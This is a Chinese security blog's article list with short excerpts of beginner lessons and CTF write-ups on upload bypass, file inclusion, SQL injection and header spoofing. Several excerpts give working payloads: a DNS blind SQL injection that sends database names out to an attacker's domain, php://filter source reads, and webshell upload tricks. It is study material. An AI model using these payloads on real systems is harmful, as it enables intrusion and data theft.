自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(30)
  • 收藏
  • 关注

原创 高速缓存cache1

首先,计算机中主要有3种存储设备,磁盘,主存,寄存器。计算机要运行程序,得让处理器cpu去访问存储设备,所以如何让处理器快速的与存储设备进行数据读取,就反应了计算机的性能和程序的运行效率。磁盘存储空间大,但处理器从磁盘读取数据最慢。主存,存储空间比磁盘小,但处理器访问速度比磁盘快寄存器,存储空间最小,访问速度最快。处理器的处理速度远高于从主存读取数据的速度,且他们之间的速度差距还在以为半导体技术的进步不断扩大。从而有了高速缓存存储器cache,它是一种存储大小与读取速度均介于主存和寄存器之间的存

2020-11-15 08:46:27 1188

原创 安全入门之文件操作2

一、简单的文件上传实例简单的文件上传二、绕过内容检查内容检查就是对用户上传的文件的文件内容进行分析,查看该文件是否符合上传规范。例如用户上传了一个php文件,程序在检查该php文件内容时没有找到符合规范的文件内容那么就不允许该文件的上传(如文件头等)。对于这样的检查,我们可以使用抓包工具来修改上传文件的文件头实现绕过,例如:下图为我们想要上传的文件,文件的内容是一句话木马。如果存在对文件内容的检查,因为该文件的文件内容不存在规范的文件头,所以一般是无法上传成功的。但其实我们只要在文件内容

2020-08-19 12:19:54 231

原创 安全入门之文件操作1

一、什么是文件上传文件上传漏洞是由于在用户上传文件时没有对用户上传的文件的后缀、类型等进行严格的限制。导致攻击者可以上传php等脚本文件,在远程服务器上执行,达到攻击的目的。...

2020-08-19 12:19:39 236

原创 ctf练习之签到般的包含

一、进入目标站点,查看源码,查看robots.txt文件均无特别发现。二、选择上传一个php文件,就显示上传失败。三、测试了一下后发现只能上传jpg文件。且保存路径在upload下。四、

2020-08-12 08:48:31 519

原创 ctf练习之试试协议吧

一、进入目标站点,查看网页源码。二、根据提示点击,得到新提示,访问flag.php文件。三、提示说flag在这里,但是没有显示,打开burp suite,抓包看看。四、任然是啥也没有,既然说flag在该文件中,那可能是存在脚本块使得html无法显示。五、使用php伪协议来获取文件数据流。得到base64编码的内容。(php://filter/read=convert.base64-encode/resource=flag.php)六、解码,得到flag。...

2020-08-10 16:54:33 473

原创 ctf练习之试下phpinfo吧

一、进入目标站点,查看网页源码,大概率是一个文件包含的漏洞。二、测试lang参数,在lang=…/phpinfo.php时,成功回显信息,在该文件中ctrl+f查找flag,发现flag。

2020-08-10 15:06:32 1057

原创 ctf练习之随意的上传

一、进入目标站点,查看网页源码。

2020-08-10 10:30:34 533

原创 ctf练习之再见上传

一、进入目标站点,查看源码,没什么发现。二、选择一张图片上传,得到提示。三、打开burp suite,设置代理。抓包修改文件名,并发送。

2020-08-09 09:14:18 369

原创 ctf练习之套娃一样的上传

一、进入目标站点,查看网页源码,发现白名单限制。试着上传一张图片。二、打开burp suite,设置代理。修改上传名绕过白名单,随便把cookie值删了。三、然后发现上传文件的后缀得是黑名单中的,但又要上传后缀为php的???禁止套娃啊,喂。试着把后缀改为PHP大写的。nice又回来了,不过四、让我们理清一下思路,首先第一层防御应该是一个暂时只知道有php后缀的白名单,第二层是文件格式也就是content-Type,第三层是一个暂时只知道有php后缀的黑名单。五、在多次尝试后,发现phtml

2020-08-08 11:30:39 762

原创 ctf练习之Easy upload

一、进入目标站点,查看网页源码,发现上传后缀白名单。二、先上传一个.png的图片看看,得到提示。三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。四、在图片内容的中间位置插入内容,得到flag...

2020-08-07 12:43:17 2586

原创 ctf练习之Check your source code

一、进入目标站点,查看源代码,发现可能存在source.txt文件二、找到source.txt文件,发现如下判定,说明只要用户为admin密码不为admin且cookie合适就可以登录,最后一行设置了cookie。三、打开burp suite并设置代理,可以看到如下cookie,将ahash的值进行base64解码,得到:88adminadmin,所以由cookie的构造(上面的setcookie函数)可知,secret对象的值为88.三、构造cookie值,base64编码的88+admin+

2020-08-07 09:28:08 1010

原创 ctfl练习之迷了路

一、进入目标站点,查看源代码,没有什么发现二、查看robots.txt文件,F12查看网络信息均无明显信息。三、打开burp suite,设置代理。由站点页面的国家信息,联系到可能与Accept-language请求有关,尝试修改,发现页面多了flag{字符,可以确定思路正确。四、百度下列图片各国语言的代码简写依次为en-US、en-GB、fr-FR、de-DE、ja-JP、ko-KR、es-ES、sv-fi。(百度关键字:各国语言简写代码)五、将获得的字符拼接得到:flag{Thisis_

2020-08-06 15:32:55 337

原创 ctf练习之就差一把钥匙

一、进入目标站点、查看源代码,没有什么发现二、查看网站的robots.txt文件,发现存在/console路径三、进入/console路径,查看源代码,没有发现四、打开burp suite,设置代理,准备进行ip伪造五、进行X-Forwarded-For伪造,发现408请求超时错误。六、在试试X-Real-Ip伪造,同样是408错误。七、试一下Client-Ip伪造,发现flag。八、在多次尝试后发现,X-Forwarded-For伪造也可以获得flag。九、那么为什么一开始使

2020-08-06 11:58:14 1177

原创 SQL注入之DNS盲注

一、准备一个自己的域名利用DNS进行sql盲注需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要注入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53端口即可。二、构造注入语句注入语句:http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))#可以利用sqlmap中的dns.py脚本监听53端

2020-07-28 10:24:41 288

原创 ctf练习之闯关游戏

1.进入第一关,直接点开F12调试。2.发现可能存在1.php.bak文件,查看文件发现确实存在。3.发现一个跳转文件,进入来到第二关。4.没有什么特别的发现,随便输个数点击按钮。5.跳出一个弹框,点击确定后会返回the2dn.php,想着应该是要绕过点击进入3rd.php,所以直接使用重定向语句:6.进入第三关,修改标签display为block即可。...

2020-07-22 12:03:39 1772

原创 ctf练习之wireshark

1.用wireshark打开题目所给的pcap文件,在19号SMB数据包中发现password,在16号数据包中发现Encryption Key。2.下载彩虹表,使用John the Ripple工具破解密码(Linux环境)。构造一个John格式的hash文件命名为password.txt。它的格式为:user::domain:ANSI_Password:Unicode_Password:Encryption_Key3.执行如下命令:netntlm.pl --seed “NETLMIS” --

2020-07-22 10:42:44 2772

原创 ctf练习之音频文件

1.下载音频文件,发现实验环境听不了。2.想着看看它的音轨好了,放进cool edit中。3.可以看到2段音轨,分别放大来看,发现上面那一段有点像莫斯代码。4.把上面一段音轨通过摩斯密码解密后得到5bc925649cb0188f52e617d70929191c即为flag。...

2020-07-22 09:54:12 2177

原创 ctf练习之抓包

1.进入练习网站,点击enter。发现说需要admin才能进去,查看cookie,有user和member两个参数,所以先看看有没有cookie注入。打开bure suite,设置代理,获取抓包信息。2.分析抓包信息,发现Member的参数可能是一个base64编码的内容,对它解码得打Normal单词。3.尝试用base64编码Admin,在修改cookie的值,发送修改包,得到flag。...

2020-07-22 09:31:51 1439

原创 CTF练习之文件包含1

1.点击3个跳转页面,发现可能存在文件包含漏洞。2.使用php filter获取源码。…/index.php?page=php://filter/convert.base64-encode/resource=index3.对得到的base64编码解码,使用浏览器控制台window.atob()。发现如果GET请求log参数有对应的值的话,就可以包含flag.txt文件。4.访问flag.txt确认确实有该文件,不过无权限访问。5.使用php filter得到login界面的源码,并解码。发

2020-07-21 16:09:28 615

原创 安全入门之SQL注入2

安全入门之SQL注入2一、header注入二、mssql报错注入1.判断是否有注入点2.获取必要信息3.获取字段三、mssql回显注入1.判断是否有注入点2.获取字段3.获取所需数据库表和内容4.获取字段四、mssql提权一、header注入header注入是利用站点在获取用户请求头时未过滤用户输入进行攻击的。例如:$uagent = $_SERVER['HTTP_USER_AGENT'];$sql = "select * from uagents where uagent='$uagent'

2020-07-16 10:47:06 127

原创 安全入门之SQL注入1

安全入门之SQL注入1一、sql注入原理二、sql注入类型1.数字型注入点2.字符型注入点3.搜索型注入点三、sql注入流程1.判断是否存在注入点2.得到字段数3.寻找输出点四、sql盲注1.特性2.布尔型盲注3.时间型盲注一、sql注入原理本质上来说,sql注入就是数据库把用户输入的数据当做数据库代码来执行了。例如:$id = $_GET['id'];$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"

2020-07-15 09:14:53 151

原创 安全入门之工具篇2

安全入门之工具篇2一、Brup Suite实例1.暴力破解2.文件上传绕过类型检测二、sqlmap实例1.sqlmap进行sql注入2.get或post注入一、Brup Suite实例1.暴力破解进入DVWA靶机brute force界面输入账号:admin密码:1然后点击登录,查看抓包内容。成功获取包后,点击鼠标右键-send to intruder,进入intruder项,可以看到四个选项。Target主要是设置暴力破解访问的host地址和对应的端口号,在这里不需要改变。点击positio

2020-07-14 11:02:46 129

原创 安全入门之工具篇1

安全入门之工具篇1一、浏览器插件1.Max HackBar插件2.FoxyProxy Standard3.Simple Modify headers4.Web Developer5.安装以上插件二、Burp Suite工具1.安装Burp Suite2.功能介绍3.抓包功能三、sqlmap1.安装sqlmap2.介绍3.基本语句4.拓展语句一、浏览器插件1.Max HackBar插件一个firefox下的拓展插件,主要可以帮助我们测试sql注入、xss漏洞和网站的安全等,帮助我们做代码的安全审计。

2020-07-13 13:21:44 511

原创 安全入门之Linux基础1

安全入门之Web安全6(Linux基础)

2020-07-11 10:41:32 211

原创 安全入门之PHP基础1

安全入门之Web安全5(PHP基础)一、PHP的一些相关知识1.PHP相关编码函数2.PHP序列化与反序列化一、PHP的一些相关知识1.PHP相关编码函数 ASCII编码ord() 函数返回字符串的首个字符的 ASCII 值。chr() 函数从指定的 ASCII 值返回字符。 URL编码urlencode()函数便于将字符串编码并将其用于 URL 的请求部分,同时它还便于将变量传递给下一页。urldecode()函数可以解码给出的已编码字符串中的任何 %##。 加号(’+’)被解码成一个空

2020-07-09 15:42:06 131

原创 安全入门之web基础4

安全入门之Web安全4(web安全基础)一、web服务端简介1.实验准备1)WEB发展2)CSS3)主流架构4.)PHPStudy(Windows环境)2.一个小例子1)使用PHPStudy2)真正的小例子一、web服务端简介1.实验准备1)WEB发展web是由不同地域的所有web服务器有机组成的,它最初设计是用以呈现静态页面,而后GIF图片出现,第一次为HTML页面引入了动态元素,随着技术发展,CGI出现,再次使得web动态信息服务兴起,但因为CGI对每一个请求都会启动一个进程来响应,因此性能问

2020-07-08 16:51:11 217

原创 安全入门之web基础3

安全入门之Web安全3(web安全基础)一、常见的浏览器协议1.FTP协议2.HTTPS协议3.FILE协议二、HTTP1.熟悉HTTP报文2.了解Base64编码3.简述HTTPS和HTTP的区别和联系一、常见的浏览器协议1.FTP协议FTP(文件传输协议)是TCP/IP协议组之一,它由FTP服务器和FTP客户端组成,用户可以使用FTP客户端通过FTP协议访问FTP服务器资源。默认情况下FTP协议使用TCP端口中的20和21两个端口,20端口用于传输数据,21端口用于传输控制信息。FTP协议支持两

2020-07-08 11:21:23 173

原创 安全入门之web基础2

安全入门之Web安全2(web安全基础)一、Web简介二、Web通信基础1.web通信过程2.URL3.HTTP协议基础三、浏览器特性和安全策略1.同源策略2.沙盒框架(HTML5)3.Flash安全沙箱4.Cookie的安全策略5.内容安全策略(CSP)一、Web简介1.Web又称万维网(World Wide web),是一个互联网应用。2.Web的工作流程为,用户向浏览器提供一个域名,由浏览器去请求该域名站点的资源,站点做出响应返回数据资源给浏览器,浏览器在显示给用户站点网页内容。3.早期的we

2020-07-07 14:08:05 216

原创 安全入门之web基础1

安全入门之Web安全1(web安全基础)一、HTML基础1.HTML内容1.HTML又称超文本标记语言,是一种用于制作HTML文档的标记语言。2.HTML文档的编写一般分为三种,手动编写,可视化工具编写,web服务器 自动生成.3.HTML的命名格式为—— * .html、* .htm。其中*中的内容不能有空格,特殊符号,但可以有下划线,且是区分大小写的。2.HTML结构其元素(类似于:···)的特点有成双成对,即又开始标签也有结束标签(也存在没有结束标签的元素)例如下面这个小例子:&l

2020-07-07 09:46:35 159

原创 JAVA实现SOCKET多客户端通信

JAVA实现SOCKET多客户端通信一、ServerSocket1.为了方便调试,先创建一个界面用于显示客户端连接信息2.启动Socket服务3.服务器处理类HandleServer4.一些方法方便ServerTools类实现二、ServerTools1.实现指定服务器ID输出信息的工具三、ClientSocket1.同样的先建一个简单的界面用于输出信息和显示信息2.创建一个线程用于循环获取信息并...

2018-12-15 22:20:09 6137 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除